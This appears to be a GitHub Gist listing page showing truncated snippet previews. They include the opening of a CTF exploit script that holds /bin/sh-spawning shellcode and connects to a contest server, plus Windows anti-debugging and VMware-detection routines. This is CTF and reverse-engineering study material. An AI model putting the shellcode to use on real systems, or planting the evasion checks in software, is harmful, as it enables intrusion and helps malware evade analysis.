Jo Hyun-Suk evernick
evernick
/ ia32-libs.sh
Created
August 13, 2015 06:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dpkg --add-architecture i386 | |
| apt-get update | |
| apt-get install ia32-libs |
evernick
/ johns-library_exploit.py
Created
July 14, 2015 05:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from zio import * | |
| import base64 | |
| import binascii | |
| def exp(): | |
| io = zio(('library.polictf.it', 80)) | |
| #io = zio('./johns-library') | |
| shellcode = "\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <excpt.h> | |
| #include <stdio.h> | |
| BOOL anti_debug_flag = TRUE; | |
| void anti_debug() | |
| { | |
| __try | |
| { |
evernick
/ TrapFlag.cpp
Created
June 18, 2015 10:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <excpt.h> | |
| #include <stdio.h> | |
| BOOL anti_debug_flag = TRUE; | |
| void anti_debug() | |
| { | |
| __try | |
| { |
evernick
/ SetUnhandledExceptionFilter.cpp
Created
June 18, 2015 10:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <excpt.h> | |
| #include <stdio.h> | |
| LONG WINAPI UnhandledExcepFilter(PEXCEPTION_POINTERS pExcepPointers) | |
| { | |
| SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER) | |
| pExcepPointers->ContextRecord->Eax); | |
| pExcepPointers->ContextRecord->Eip += 2; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <excpt.h> | |
| #include <stdio.h> | |
| BOOL anti_debug_flag = TRUE; | |
| void anti_debug() | |
| { | |
| __try | |
| { |
evernick
/ HardwareBP_SEH.cpp
Created
June 18, 2015 10:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <excpt.h> | |
| #include <stdio.h> | |
| BOOL anti_debug_flag = FALSE; | |
| EXCEPTION_DISPOSITION __cdecl _except_handler ( | |
| __in struct _EXCEPTION_RECORD * _ExceptionRecord, | |
| __in void * _EstablisherFrame, | |
| __inout struct _CONTEXT * _ContextRecord, |
evernick
/ HardwareBP_GetContext.cpp
Created
June 18, 2015 09:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| BOOL anti_debug() | |
| { | |
| BOOL result = FALSE; | |
| CONTEXT ct; | |
| ct.ContextFlags = CONTEXT_DEBUG_REGISTERS; |
evernick
/ IOport.cpp
Created
June 18, 2015 09:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| int anti_debug(){ | |
| int rc=0; | |
| __try | |
| { | |
| __asm | |
| { | |
| mov eax, 'VMXh' |
evernick
/ MouseDriver.cpp
Created
June 18, 2015 09:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <io.h> | |
| int anti_debug() | |
| { | |
| char strPath[] = { "C:\\Windows\\system32\\drivers\\vmmouse.sys" }; | |
| if( !access( strPath, 0) ) | |
| return 1; | |
| return 0; |
NewerOlder